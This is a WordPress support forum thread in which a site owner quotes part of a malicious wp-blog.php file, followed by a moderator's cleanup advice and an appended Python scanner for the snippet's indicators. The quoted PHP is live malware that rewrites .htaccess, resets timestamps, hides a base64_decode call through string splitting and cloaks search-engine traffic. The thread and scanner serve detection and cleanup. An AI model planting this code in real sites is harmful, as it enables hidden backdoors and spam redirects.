Title: Strange file
Last modified: January 20, 2020

---

# Strange file

 *  Resolved [mgc](https://wordpress.org/support/users/mgc/)
 * (@mgc)
 * [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/)
 * I noticed a strange file in my managed wordpress folder called wp-blog.php. In
   it, there’s some interesting code. Here’s a snippet:
 *     ```
       @ini_set('display_errors', '0');
       error_reporting(0);
       $track = 'avt';
       if (isset($_REQUEST['check'])) {
       	$htaccess = '# BEGIN WordPress
       <IfModule mod_rewrite.c>
       RewriteEngine On
       RewriteBase /
       RewriteRule ^(.+).html$ wp-blog.php?key=$1
       RewriteRule ^index\.php$ - [L]
       RewriteCond %{REQUEST_FILENAME} !-f
       RewriteCond %{REQUEST_FILENAME} !-d
       RewriteRule . /index.php [L]
       </IfModule>
   
       # END WordPress';
       if (file_put_contents('.htaccess', $htaccess)) {
       	touch('.htaccess', $actime);
       	touch('wp-blog.php', $actime);
       	echo 'ok';
       }
       exit;
       }
   
       if (is_dir("wp-includes/Text/Diff/p")) {
       	$dir = "wp-includes/Text/Diff/p";
       }
       else $dir = "wp-content/uploads/wp";
   
       $res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
   
       $redirect = 0;
       $fof = '404 not found';
   
       function getRealIpAddr() {
           if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
             $ip=$_SERVER['HTTP_CLIENT_IP'];
           }
           elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
             $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
           }
           else {
             $ip=$_SERVER['REMOTE_ADDR'];
           }
           return $ip;
       }
   
       $ua = $_SERVER['HTTP_USER_AGENT'];
       $ip = getRealIpAddr();
       $ref = $_SERVER['HTTP_REFERER'];
   
       if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
   
       $ea = '_shaesx_';
       $ay = 'get_data_ya';
       $ae = 'decode';
       $ea = str_replace('_sha', 'bas', $ea);
       $ao = 'wp_ccd';
       $ee = $ea.$ae;
       $oa = str_replace('sx', '64', $ee);
       $genpass = "xxx+xxx";
       $tdpass = "xxxx";
   
       if (ini_get('allow_url_fopen')) {
           function get_data_ya($mmm) {
               $data = file_get_contents($mmm);
               return $data;
           }
       }
       ```
   
 * There’s more, but this part looks like it’s doing something suspicious.
 * I’m not a developer and only know a bit about coding, but is this malicious? 
   How could it have been inserted? Also, can it in any way be tied to some 500-
   error related issues I’ve had recently? I appreciate your feedback. Thank you.
    -  This topic was modified 6 years, 4 months ago by [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/).

Viewing 2 replies - 1 through 2 (of 2 total)

 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/#post-12344580)
 * Get a fresh cup of coffee, take a deep breath and carefully follow [this guide](https://wordpress.org/support/article/faq-my-site-was-hacked/).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://wordpress.org/support/article/hardening-wordpress/).
 * If you’re unable to clean your site(s) successfully, there are reputable organizations
   that can clean your sites for you. Sucuri and Wordfence are a couple.
 *  Thread Starter [mgc](https://wordpress.org/support/users/mgc/)
 * (@mgc)
 * [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/#post-12345661)
 * Hi Parrotlover and Steve,
 * Thank you for confirming this. I’ve installed some reputable security plugins,
   run some external scans, and spent a few hours now combing through all the folders
   looking for anything that looks even remotely suspicious.
 * I greatly appreciate your feedback and suggestions!
 * Cheers,
    Michael
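
An added example, not part of the original thread and not WordPress code: a small Python sweep for the markers visible in the snippet quoted in the first post (the `wp-blog.php` rewrite rule, the paths it checks, its referrer test). `rebuild_function_name()` replays the snippet's `str_replace` chain to show it assembles `base64_decode`, so a plain text search for that name would miss this file. The function names and the sample tree in `demo()` are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators copied from the quoted wp-blog.php snippet; a hit means "review this file".
CONTENT_PATTERNS = {
    "htaccess rewrite to wp-blog.php": re.compile(rb"RewriteRule\s+\S+\s+wp-blog\.php\?key="),
    "split-string base64_decode": re.compile(rb"str_replace\(\s*'_sha'\s*,\s*'bas'"),
    "search-engine referrer check": re.compile(rb"google\|bing\|yandex"),
    "touch() resets wp-blog.php timestamp": re.compile(rb"touch\(\s*'wp-blog\.php'"),
}
PATH_INDICATORS = ["wp-blog.php", "wp-includes/Text/Diff/p", "wp-content/uploads/wp"]


def rebuild_function_name():
    """Replay the snippet's str_replace chain to show what $oa ends up holding."""
    ea = "_shaesx_".replace("_sha", "bas")      # 'basesx_'
    return (ea + "decode").replace("sx", "64")  # 'base64_decode'


def scan(root):
    """Return sorted (relative path, reason) findings under a WordPress root."""
    root = Path(root)
    findings = set()
    for rel in PATH_INDICATORS:
        if (root / rel).exists():
            findings.add((rel, "path named in the snippet"))
    for path in root.rglob("*"):
        if not path.is_file() or (path.suffix != ".php" and path.name != ".htaccess"):
            continue
        data = path.read_bytes()
        for reason, pattern in CONTENT_PATTERNS.items():
            if pattern.search(data):
                findings.add((path.relative_to(root).as_posix(), reason))
    return sorted(findings)


def demo():
    """Build a constructed site tree (one clean file, two planted) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        (site / "index.php").write_text("<?php require 'wp-blog-header.php';")
        (site / ".htaccess").write_text("RewriteRule ^(.+).html$ wp-blog.php?key=$1\n")
        (site / "wp-blog.php").write_text("<?php $ea = str_replace('_sha', 'bas', $ea);")
        return scan(site)


if __name__ == "__main__":
    print(rebuild_function_name(), demo())
```

To check a real install, call `scan()` with the path to the WordPress root instead of running `demo()`.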


The topic ‘Strange file’ is closed to new replies.

## Tags

 * [suspicious file](https://wordpress.org/support/topic-tag/suspicious-file/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 2 replies
 * 3 participants
 * Last reply from: [mgc](https://wordpress.org/support/users/mgc/)
 * Last activity: [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/#post-12345661)
 * Status: resolved

